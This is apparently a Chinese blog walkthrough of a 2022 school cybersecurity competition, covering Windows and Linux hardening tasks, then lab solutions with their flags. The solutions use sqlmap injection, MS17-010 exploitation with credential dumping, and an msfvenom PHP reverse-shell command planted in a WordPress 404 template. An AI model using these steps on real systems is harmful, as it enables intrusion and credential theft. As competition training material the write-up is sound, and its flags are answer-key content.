2022年中职组“网络安全”赛项吉安市竞赛解析

本文涉及的产品
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
云解析 DNS,旗舰版 1个月
全局流量管理 GTM,标准版 1个月
简介: 2022年中职组“网络安全”赛项吉安市竞赛解析

模块A 基础设施设置/安全加固(200分)

一、项目和任务描述:

假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。

二、服务器环境说明

WindowsServer用户名:administrator,密码:123456

LinuxServer用户名:root,密码:123456

数据库用户名:root,密码:123456


三、说明:

1.所有截图要求截图界面字体清晰,并粘贴于相应题目要求的位置;

2.文件名命名及保存:网络安全模块A-XX(XX为工位号),PDF格式保存;

3.文件保存到U盘提交。

A-1:Windows操作系统安全配置

请对服务器WindowsServer按要求进行相应的设置,提高服务器的安全性。

1.设置密码策略必须同时满足大小写字母、数字、特殊字符,最小密码长度不少于8个字符,密码最长使用期限为15天。将服务器上密码策略配置信息截图;

2.在用户登录系统时,应该有“For authorized users only”提示信息,将登录系统时系统弹出警告信息窗口截图;

3.一分钟内仅允许5次登录失败的尝试,超过5次,登录帐号锁定1分钟,将账号锁定策略配置信息截图;


4.设置远程桌面用户非活动会话连接超时应小于等于5分钟,将RDP-Tcp属性对应的配置界面截图;

5.通过SSL(TLS 1.0)加密服务器的远程桌面服务,将RDP-Tcp属性对应的配置界面截图;

6.仅允许超级管理员账号关闭系统,将关闭系统属性的配置界面截图;

7.开启IIS的日志审计记录,日志文件保存格式为W3C,只记录日期、时间、客户端IP地址、用户名、服务器端口、方法,将W3C日志记录字段的配置界面截图;

8.设置网站的最大并发连接数为1000,网站连接超时为60s,将编辑网站限制的配置界面截图;

9.禁用IIS内核缓存,避免对方利用ms15_034进行DOS攻击,出现蓝屏的现象,将编辑输出缓存设置的配置界面截图;

10. 设置user1用户只能在上班时间(周一至周五的9:00~18:00)可以登录。将user1的登录时间配置界面截图。

A-2:Linux操作系统安全配置

请对服务器LinuxServer按要求进行相应的设置,提高服务器的安全性。

1.设置最小密码长度不少于8个字符,密码最长使用期限为15天。将/etc/login.defs配置文件中对应的部分截图;

2.设置在用户登录系统时,会有“For authorized users only”提示信息,将登录系统时系统弹出提示信息界面截图;

3.设置root用户的计划任务。每天早上7:50自动开启vsftpd服务,22点50时关闭;每周六的7:30时,重新启动vsftpd服务。使用crontab –l 查看计划任务,将回显结果截图;

4.禁止匿名用户登录vsftpd服务,将/etc/vsftpd/vsftpd.conf配置文件中对应的部分截图;

5.限制客户端连接vsftpd服务时,同一个IP最多只能打开两个连接,将/etc/vsftpd/vsftpd.conf配置文件中对应的部分截图;

6.将SSH服务的端口号修改为2222 ,使用命令netstat -anltp | grep sshd查看SSH服务端口信息,将回显结果截图;

7.禁止root用户通过SSH远程登录,将/etc/ssh/sshd_config 配置文件中对应的部分截图;

8.禁止mysql服务以管理员权限的账号运行,将/etc/my.cnf配置文件中对应的部分截图;

9.删除默认数据库test, 然后使用show databases;命令查看当前的数据库信息,将回显结果截图;

10.将数据库用户user1的密码使用MD5加密,然后在数据库中使用select password from user where user=’user1’;命令查看user1的密码,将回显结果截图。

模块B 安全事件响应/网络安全数据取证/应用安全(400分)

B-1:数据库服务深入测试

任务环境说明:

 服务器场景:Server2101

 服务器场景操作系统:未知(关闭连接)

  1. 通过分析靶机Server2101页面信息,寻找页面,将WEB服务存在SQL注入的页面名称作为Flag提交;

nmap -p- 扫描 发现80和443有http,https服务,访问网站



51ba7a0248634507bf937a172c6a8d87.png




686dac2425704092a45885f98bcc2109.png







3b66a0f3482f447994cf0685ec6d033a.png


通过猜测,可得知此页面有sql注入


  1. 通过本地PC中的深入测试平台Kali对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务的数据库名称作为Flag提交;

直接sqlmap扫描


flag:[test]

通过本地PC中的深入测试平台Kali对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务用户的表名称作为Flag提交;


flag:[iuser]


通过本地PC中的深入测试平台Kali对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB登陆用户admin用户的明文密码作为Flag提交;



484c7d0d430a4d5cb831027d7e5caa70.png

flag:[123321]

B-2:Wireshark数据包分析

任务环境说明:

 服务器场景:FTPServer220223

 服务器场景操作系统:未知(关闭连接)

 FTP用户名:wireshark0051密码:wireshark0051

从靶机服务器的FTP上下载wireshark0051.pcap数据包文件,找出获取到的可成功登录目标服务器FTP的账号密码,并将获取到的账号密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;

分析语句:ftp and tcp contains “Login”

追踪最后一个数据Tcp流




58d4346dea4e4fc0912dc90d1e350349.png




636fa1c3bf4d40d9987da4a6185d5d01.png

Flag:[admin:admin654321]

继续分析数据包wireshark0051.pcap,找出黑客使用获取到的账号密码登录FTP的时间,并将黑客登录FTP的时间作为Flag值(例如:14:22:08)提交;




532f39c6d1584483b0f1450fd4187423.png

Flag:[1:33:08]

继续分析数据包wireshark0051.pcap,找出连接FTP服务器时获取到的FTP服务版本号,并将获取到的FTP服务版本号作为Flag值提交;

继续分析那一条数据





Flag:[3.0.2]

  1. 继续分析数据包wireshark0051.pcap,找出成功登录FTP服务器后执行的第一条命令,并将执行的命令作为Flag值提交;

继续分析那一条数据





86cd5ce10f4f480494d07e17ba1a0a0e.png


发现回显为SYST

flag:[dir]


  1. 继续分析数据包wireshark0051.pcap,找出成功登录FTP服务器后下载的关键文件,并将下载的文件名称作为Flag值提交;

接上数据



继续分析数据包wireshark0051.pcap,找出暴力破解目标服务器Telnet服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;


分析语句:telnet and tcp contains “pass”

追踪最后一个数据tcp流

字符串:tcp.stream eq 23a3ba22c84651422384bfe5409ef41a39.png


Flag:[rroooott:toor654321]


继续分析数据包wireshark0051.pcap,找出在服务器网站根目录下添加的文件,并将该文件的文件名称作为Flag值提交;



整个对话替换成10.1.128.11:47638 → 10.1.128.9:23 (328 bytes)



851e169a88fc4e62bd0809730aa6c272.png


flag:[admin654321.php]

  1. 继续分析数据包wireshark0051.pcap,找出在服务器系统中添加的用户,并将添加的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交。


90e6643cb0d444b2b8c6efbc00fc917a.png


flag:[user123:123456]

B-3:Windows操作系统深入测试

任务环境说明:

 服务器场景:Server2105

 服务器场景操作系统:Windows(版本不详)(关闭连接)

Ms17-010

  1. 通过本地PC中深入测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为Flag值提交;

nmap -p- -sV ip 扫描靶机







39037229e85a44b2908cb12417423408.png


flag:[microsoft-ds]

  1. 通过本地PC中深入测试平台Kali对服务器场景进行深入测试,将该场景网络连接信息中的DNS信息作为Flag值 (例如:114.114.114.114) 提交;

进入msf,调用ms17-010这个模块


8885d9a3281c4f49b374156f88f67de3.png

设置靶机ip


利用kiwi获取管理员密码


获取到管理员密码,其他的题目就迎刃而解了!

直接远程登录就行


d9b891d0a6e14fa2b790f370dc62ab6c.png

flag:[121.212.121.212]

  1. 通过本地PC中深入测试平台Kali对服务器场景进行渗透测试,将该场景中的当前最高账户管理员的密码作为Flag值提交;

flag:[P@ssw0rd]

通过本地PC中深入测试平台Kali对服务器场景进行深入测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为Flag值提交;


flag:[flag123456789]

  1. 通过本地PC中深入测试平台Kali对服务器场景进行深入测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为Flag值提交;





921e0d6c0f1e46f5a69b98a85710f49a.png

flag:[846548795432]

  1. 通过本地PC中深入测试平台Kali对服务器场景进行深入测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为Flag值提交;






26d59ca69d2842c18999264758cc9ae1.png



B-4:系统利用与提权

任务环境说明:

 服务器场景:PYsystem001

 服务器场景操作系统:Ubuntu(显示链接)

 服务器用户名:未知 密码:未知

这题我在江西省赛中写过一个方法,我这里换一个方法


  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;

nmap -p- ip 扫描靶机



1ff5f0506cd143bcb17ef3d2d42ec3bc.png

flag:[443,8080]

  1. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;

扫描靶机后台网址:dirb http://172.16.105.245:8080/


abc57c4948b3480792546658aa665c27.png

访问后台,弱口令进去



flag:[admin:123456]


利用Kali深入机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;

使用命令msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.100 LPORT=886 -f raw > shell.php来生成php格式的反弹木马脚

本,上述指令部分选项的作用如下:

-p:指定payload 为php/meterpreter/reverse_tcp;

-f:设置输出格式(raw)

d66bc5f791b14ac69c907bbfd70fdcde.png

flag:[Payload]


对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;

MSF会把生成的PHP 反弹木马文件保存为shell.php,我们使用命令cat shell.php

来查看木马的结构,在上传后门到被测主机之前,首先要删除脚本前面的注释符号/*。未删除注释的源码:



简单阅读发现该木马主要是通过靶机中的php函数来建立套接字与深入机进行通信的。那么也就意味着我们可以通过在本地使用nc

来监听套接字连接过来端口实现远程控制。接下来使用命令msfconsole打开metasploit深入测试平台,


使用命令use exploit/multi/handler调用后门模块进行利用,然后使用命令set payload php/meterpreter_reverse_tcp

设置该模块所使用的payload载荷为php反弹shell载荷,填充完整必须要配置的参数(LHOST、LPORT)

a5ae8e91a1a8475bb18c0da40e7865d4.png


最后使用命令exploit启动对8888端口进行监听。

将木马源码复制出来上传到靶机,替换掉服务器的404.php页面内容,在左侧仪表盘中选择外观,点击编辑,然后进入Twenty

Thirteen的404模板编辑页面,将上面生成的php木马覆盖到该页面中


更新完成后,使用火狐浏览器来访问http://172.16.105.246/wordpress/404.php来触发php反弹木马。

接下来步骤和之前我的那篇博客一样


查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;

在Kali攻击机中查找可使用的源码,将找到的源码文件名作为FLAG(形式:[文件名])提交;

利用上述源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

利用上述源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。

B-5:网页渗透

任务环境说明:

 服务器场景:Server2120

 服务器场景操作系统:未知(封闭靶机)

 用户名:未知 密码:未知

由于这题的环境我没有,我用的是和它相似的环境来尝试的,我的步骤只能做来参考

  1. 访问服务器的网站主页,猜测后台数据库中本网页中应用的库名称长度,将长度作为flag提交;

由题可知,这题的靶机有一个web服务,我们可以先用dirb扫描出后台来





5b446331f5f54ec68102ab4b12c86f4d.png

  1. 访问服务器的网站主页,猜测后台数据库中本网页中应用的库名称,将名称作为flag提交;

接下来我们使用sqlmap来进行盲注

通过扫描后台网站存在注入点

5733bccdc8194c66b60252b123e79cbe.png

flag:“5”

  1. 访问服务器的网站主页,猜测后台数据库中本页面中应用的表名称长度,将表名称长度作为flag提交;

flag:"4’

  1. 访问服务器的网站主页,猜测后台数据库中本网页中应用的表名称,将名称作为flag提交

flag:“user”

  1. 访问服务器的网站主页,猜测后台数据库中本页面中第二个应用的字段名称,将名作为flag提交。








edf33729d3264ab482e7cbb0c16e453a.png



22a61dbddef04be1beb995e5ae2ae276.png


flag:“hello2”

  1. 访问服务器的网站主页,猜测后台数据库中本页面中ID为1的用户名,将用户名作为flag提交。


模块C CTF夺旗-攻击(200分)

一、项目和任务描述:

假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。

请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录答题平台。

二、操作系统环境说明:

客户机操作系统:Windows 10/Windows7

靶机服务器操作系统:Linux/Windows

三、漏洞情况说明:

1.服务器中的漏洞可能是常规漏洞也可能是系统漏洞;

2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;

3.靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;

4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;

5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;

6.操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限;

7.操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。

四、注意事项:

1.不能对裁判服务器进行攻击,警告一次后若继续攻击将判令该参赛队离场;

2.flag值为每台靶机服务器的唯一性标识,每台靶机服务器仅有1个;

3.选手攻入靶机后不得对靶机进行关闭端口、修改密码、重启或者关闭靶机、删除或者修改flag、建立不必要的文件等操作;

4.在登录自动评分系统后,提交靶机服务器的flag值,同时需要指定靶机服务器的IP地址;

5.赛场根据难度不同设有不同基础分值的靶机,对于每个靶机服务器,前三个获得flag值的参赛队在基础分上进行加分,本阶段每个队伍的总分均计入阶段得分,具体加分规则参照赛场评分标准;

6.本环节不予补时。

模块D CTF夺旗-防御(200分)

一、项目和任务描述:

假定各位选手是某安全企业的网络安全工程师,负责若干服务器的渗透测试与安全防护,这些服务器可能存在着各种问题和漏洞。你需要尽快对这些服务器进行渗透测试与安全防护。每个参赛队拥有专属的堡垒机服务器,其他队不能访问。参赛选手通过扫描、渗透测试等手段检测自己堡垒服务器中存在的安全缺陷,进行针对性加固,从而提升系统的安全防御性能。

请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录需要加固的堡垒服务器。

二、操作系统环境说明:

客户机操作系统:Windows 10/Windows7

堡垒服务器操作系统:Linux/Windows

三、漏洞情况说明:

1.堡垒服务器中的漏洞可能是常规漏洞也可能是系统漏洞;

2.堡垒服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;

3.堡垒服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;

4.堡垒服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;

5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;

6.操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限;

7.操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。

四、注意事项:

1.每位选手需要对加固点和加固过程截图,并自行制作系统防御实施报告,最终评分以实施报告为准;

2.系统加固时需要保证堡垒服务器对外提供服务的可用性;

3.不能对裁判服务器进行攻击,警告一次后若继续攻击将判令该参赛队离场;

4.本环节不予补时。

二、说明:

1.所有截图要求截图界面、字体清晰;

2.文件名命名及保存:网络安全模块D-XX(XX为工位号),PDF格式保存;

3.文件保存到U盘提交。

目录
相关文章
|
3天前
|
安全 虚拟化
在数字化时代,网络项目的重要性日益凸显。本文从前期准备、方案内容和注意事项三个方面,详细解析了如何撰写一个优质高效的网络项目实施方案,帮助企业和用户实现更好的体验和竞争力
在数字化时代,网络项目的重要性日益凸显。本文从前期准备、方案内容和注意事项三个方面,详细解析了如何撰写一个优质高效的网络项目实施方案,帮助企业和用户实现更好的体验和竞争力。通过具体案例,展示了方案的制定和实施过程,强调了目标明确、技术先进、计划周密、风险可控和预算合理的重要性。
15 5
|
5天前
|
SQL 安全 网络安全
网络安全的护城河:漏洞防御与加密技术的深度解析
【10月更文挑战第37天】在数字时代的浪潮中,网络安全成为守护个人隐私与企业资产的坚固堡垒。本文将深入探讨网络安全的两大核心要素——安全漏洞和加密技术,以及如何通过提升安全意识来强化这道防线。文章旨在揭示网络攻防战的复杂性,并引导读者构建更为稳固的安全体系。
16 1
|
14天前
|
SQL 安全 测试技术
网络安全的盾牌与剑——漏洞防御与加密技术解析
【10月更文挑战第28天】 在数字时代的浪潮中,网络空间安全成为我们不可忽视的战场。本文将深入探讨网络安全的核心问题,包括常见的网络安全漏洞、先进的加密技术以及提升个人和组织的安全意识。通过实际案例分析和代码示例,我们将揭示黑客如何利用漏洞进行攻击,展示如何使用加密技术保护数据,并强调培养网络安全意识的重要性。让我们一同揭开网络安全的神秘面纱,为打造更加坚固的数字防线做好准备。
34 3
RS-485网络中的标准端接与交流电端接应用解析
RS-485,作为一种广泛应用的差分信号传输标准,因其传输距离远、抗干扰能力强、支持多点通讯等优点,在工业自动化、智能建筑、交通运输等领域得到了广泛应用。在构建RS-485网络时,端接技术扮演着至关重要的角色,它直接影响到网络的信号完整性、稳定性和通信质量。
|
22天前
|
存储 安全 网络安全
网络安全的屏障与钥匙:漏洞防御与加密技术深度解析
【10月更文挑战第20天】在数字世界的迷宫中,网络安全是守护我们数据宝藏的坚固盾牌和锋利钥匙。本篇文章将带您穿梭于网络的缝隙之间,揭示那些潜藏的脆弱点—网络安全漏洞,同时探索如何通过现代加密技术加固我们的数字堡垒。从基本概念到实战策略,我们将一同揭开网络安全的神秘面纱,提升您的安全意识,保护个人信息不受侵犯。
51 25
|
17天前
|
边缘计算 自动驾驶 5G
|
11天前
|
SQL 安全 算法
网络安全的屏障与钥匙:漏洞防护与加密技术解析
【10月更文挑战第31天】在数字世界的海洋中,网络安全是航船的坚固屏障,而信息安全则是守护宝藏的金钥匙。本文将深入探讨网络安全的薄弱环节——漏洞,以及如何通过加密技术加固这道屏障。从常见网络漏洞的类型到最新的加密算法,我们不仅提供理论知识,还将分享实用的安全实践技巧,帮助读者构建起一道更加坚不可摧的防线。
21 1
|
7天前
|
机器学习/深度学习 人工智能 自动驾驶
深入解析深度学习中的卷积神经网络(CNN)
深入解析深度学习中的卷积神经网络(CNN)
21 0
|
3天前
|
监控 Java 应用服务中间件
高级java面试---spring.factories文件的解析源码API机制
【11月更文挑战第20天】Spring Boot是一个用于快速构建基于Spring框架的应用程序的开源框架。它通过自动配置、起步依赖和内嵌服务器等特性,极大地简化了Spring应用的开发和部署过程。本文将深入探讨Spring Boot的背景历史、业务场景、功能点以及底层原理,并通过Java代码手写模拟Spring Boot的启动过程,特别是spring.factories文件的解析源码API机制。
14 2
|
1月前
|
缓存 Java 程序员
Map - LinkedHashSet&Map源码解析
Map - LinkedHashSet&Map源码解析
66 0

推荐镜像

更多